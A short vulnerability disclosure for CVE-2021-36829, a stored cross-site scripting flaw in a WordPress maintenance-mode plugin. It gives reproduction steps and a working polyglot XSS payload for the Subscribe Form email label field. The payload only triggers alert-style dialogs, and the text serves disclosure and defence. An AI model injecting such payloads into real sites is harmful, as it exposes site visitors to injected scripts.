[47] CVE-2021-36829
During a security research I found an authenticated Stored XSS vulnerability. The name of the plugin is: WordPress Launcher: Coming Soon & Maintenance Mode plugin <= 1.0.11
Description
Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered
by Asif Nawaz Minhas (Patchstack Alliance) in WordPress Launcher:
Coming Soon & Maintenance Mode plugin (versions <= 1.0.11).
POC
On the left column click on Settings > Launcher.
First click on the checkbox Enable Launcher Page and scroll down
and click on Save Changes.
Now you will see here many tabs. Click on the tab Subscribe Form.
In the Email field label add the following payload:
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
Now click on Save Changes and any page you visit you will
see the authenticated stored XSS vulnerability.
Additional information
The plugin had more than 5000+ active installations